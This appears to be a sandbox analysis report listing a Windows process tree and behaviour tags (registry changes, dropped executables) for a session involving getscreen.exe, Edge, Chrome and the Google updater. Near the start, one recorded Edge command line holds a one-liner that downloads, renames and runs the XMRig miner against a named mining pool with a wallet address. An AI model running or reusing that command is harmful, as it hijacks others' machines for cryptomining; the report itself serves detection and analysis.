PID 3376 wrote to memory of 1516	3376	msedge.exe	84
PID 3376 wrote to memory of 1516	3376	msedge.exe	84
PID 3376 wrote to memory of 1516	3376	msedge.exe	84

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\SoftwareSASGeneration = "1"	getscreen.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://wget https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz && tar -xz -f xmrig-6.21.3-linux-static-x64.tar.gz && cd xmrig-6.21.3 && mv xmrig cool && ./cool -o xmrpool.eu:3333 -u 4BCzRFseZPce3GUMsqGEHjeSgzzBhE3C72JdGdapz3kgdWpq4ri7NbNfTKCotSdAP2a6c6f4Qq3XHWRMJX1EYJnrDrSeJG3
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff91f303cb8,0x7ff91f303cc8,0x7ff91f303cd8
  2⤵
  PID:3196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1776,14685516570669457385,3298990281048269786,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1948 /prefetch:2
  2⤵
  PID:2224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1776,14685516570669457385,3298990281048269786,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1776,14685516570669457385,3298990281048269786,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:8
  2⤵
  PID:1516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1776,14685516570669457385,3298990281048269786,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:1
  2⤵
  PID:244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1776,14685516570669457385,3298990281048269786,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:1
  2⤵
  PID:3580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1776,14685516570669457385,3298990281048269786,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3852 /prefetch:1
  2⤵
  PID:5028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1776,14685516570669457385,3298990281048269786,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1
  2⤵
  PID:4984
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1776,14685516570669457385,3298990281048269786,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5080 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1776,14685516570669457385,3298990281048269786,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1
  2⤵
  PID:3132

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2760

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4280

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ff91acccc40,0x7ff91acccc4c,0x7ff91acccc58
  2⤵
  PID:3148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1820,i,14472355133087252317,10224167979755281492,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=1812 /prefetch:2
  2⤵
  PID:4928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2124,i,14472355133087252317,10224167979755281492,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=2116 /prefetch:3
  2⤵
  PID:3676
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2216,i,14472355133087252317,10224167979755281492,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=2192 /prefetch:8
  2⤵
  PID:3344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3100,i,14472355133087252317,10224167979755281492,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:3068
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,14472355133087252317,10224167979755281492,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3288 /prefetch:1
  2⤵
  PID:1336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4444,i,14472355133087252317,10224167979755281492,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4428 /prefetch:1
  2⤵
  PID:3932
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4248,i,14472355133087252317,10224167979755281492,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4772 /prefetch:8
  2⤵
  PID:3812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4868,i,14472355133087252317,10224167979755281492,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4852 /prefetch:8
  2⤵
  PID:4788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4808,i,14472355133087252317,10224167979755281492,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3692 /prefetch:1
  2⤵
  PID:412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3436,i,14472355133087252317,10224167979755281492,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3512 /prefetch:8
  2⤵
  PID:2740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4884,i,14472355133087252317,10224167979755281492,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3456 /prefetch:1
  2⤵
  PID:2568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3384,i,14472355133087252317,10224167979755281492,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3356 /prefetch:1
  2⤵
  PID:2212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3792,i,14472355133087252317,10224167979755281492,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3292 /prefetch:8
  2⤵
  PID:4776
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3468,i,14472355133087252317,10224167979755281492,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5416 /prefetch:8
  2⤵
  PID:4756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5304,i,14472355133087252317,10224167979755281492,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3484 /prefetch:8
  2⤵
  - NTFS ADS
  PID:4464
- C:\Users\Admin\Downloads\ChromeSetup.exe
  "C:\Users\Admin\Downloads\ChromeSetup.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Drops file in Windows directory
  PID:4440
- - C:\Windows\SystemTemp\Google4440_118297452\bin\updater.exe
    "C:\Windows\SystemTemp\Google4440_118297452\bin\updater.exe" --install=appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={EE42822F-96FD-37FD-115A-2E7E22F34140}&lang=en-GB&browser=4&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-statsdef_1&installdataindex=empty --enable-logging --vmodule=*/components/winhttp/*=1,*/components/update_client/*=2,*/chrome/updater/*=2
    3⤵
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Drops file in Program Files directory
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:4952
  - - C:\Windows\SystemTemp\Google4440_118297452\bin\updater.exe
      C:\Windows\SystemTemp\Google4440_118297452\bin\updater.exe --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=128.0.6597.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0xcbc694,0xcbc6a0,0xcbc6ac
      4⤵
      Executes dropped EXE
      PID:5068

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4772

C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
"C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --system --windows-service --service=update-internal
1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:5116
- C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
  "C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=128.0.6597.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0xfec694,0xfec6a0,0xfec6ac
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:2404

C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
"C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --system --windows-service --service=update
1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:1988
- C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
  "C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=128.0.6597.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0xfec694,0xfec6a0,0xfec6ac
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:1800
- C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1988_1228947821\126.0.6478.128_chrome_installer.exe
  "C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1988_1228947821\126.0.6478.128_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --channel=stable --installerdata="C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1988_1228947821\af0bb67c-3ccc-4f0a-a034-1e1f9ac45326.tmp"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:2328
- - C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1988_1228947821\CR_7AFDA.tmp\setup.exe
    "C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1988_1228947821\CR_7AFDA.tmp\setup.exe" --install-archive="C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1988_1228947821\CR_7AFDA.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --channel=stable --installerdata="C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1988_1228947821\af0bb67c-3ccc-4f0a-a034-1e1f9ac45326.tmp"
    3⤵
    - Boot or Logon Autostart Execution: Active Setup
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies registry class
    PID:5092
  - - C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1988_1228947821\CR_7AFDA.tmp\setup.exe
      C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1988_1228947821\CR_7AFDA.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=126.0.6478.128 --initial-client-data=0x24c,0x250,0x254,0x228,0x258,0x7ff73f9046a8,0x7ff73f9046b4,0x7ff73f9046c0
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:2072
  - - C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1988_1228947821\CR_7AFDA.tmp\setup.exe
      "C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1988_1228947821\CR_7AFDA.tmp\setup.exe" --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      PID:2524
    - - C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1988_1228947821\CR_7AFDA.tmp\setup.exe
        
        C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1988_1228947821\CR_7AFDA.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=126.0.6478.128 --initial-client-data=0x24c,0x250,0x254,0x228,0x258,0x7ff73f9046a8,0x7ff73f9046b4,0x7ff73f9046c0
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:3420
- C:\Program Files\Google\Chrome\Application\126.0.6478.128\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\126.0.6478.128\Installer\setup.exe" --rename-chrome-exe --system-level --verbose-logging --channel=stable
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:684
- - C:\Program Files\Google\Chrome\Application\126.0.6478.128\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\126.0.6478.128\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=126.0.6478.128 --initial-client-data=0x24c,0x250,0x254,0x228,0x258,0x7ff787dd46a8,0x7ff787dd46b4,0x7ff787dd46c0
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:580
- - C:\Program Files\Google\Chrome\Application\126.0.6478.128\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\126.0.6478.128\Installer\setup.exe" --channel=stable --delete-old-versions --system-level --verbose-logging
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:3052
  - - C:\Program Files\Google\Chrome\Application\126.0.6478.128\Installer\setup.exe
      "C:\Program Files\Google\Chrome\Application\126.0.6478.128\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=126.0.6478.128 --initial-client-data=0x24c,0x250,0x254,0x228,0x258,0x7ff787dd46a8,0x7ff787dd46b4,0x7ff787dd46c0
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:3324

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
PID:2920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff91acccc40,0x7ff91acccc4c,0x7ff91acccc58
  2⤵
  PID:3032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1940,i,16572518450206708630,5592563472274430781,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=1936 /prefetch:2
  2⤵
  PID:4544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1712,i,16572518450206708630,5592563472274430781,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=2052 /prefetch:3
  2⤵
  PID:4520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --flag-switches-begin --flag-switches-end
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks system information in the registry
  - Drops file in Windows directory
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Modifies system certificate store
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of SendNotifyMessage
  PID:1468
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=126.0.6478.128 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff91ab81c70,0x7ff91ab81c7c,0x7ff91ab81c88
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4956
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1960,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=1956 /prefetch:2
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1644
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1732,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=2580 /prefetch:11
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3084
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --field-trial-handle=2116,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=2716 /prefetch:13
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3564
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3052,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=3136 /prefetch:1
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3508
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3080,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=3160 /prefetch:1
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1484
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4400,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=4424 /prefetch:1
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3976
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4664,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=4564 /prefetch:1
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2040
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --field-trial-handle=4920,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=4936 /prefetch:14
    3⤵
    - Executes dropped EXE
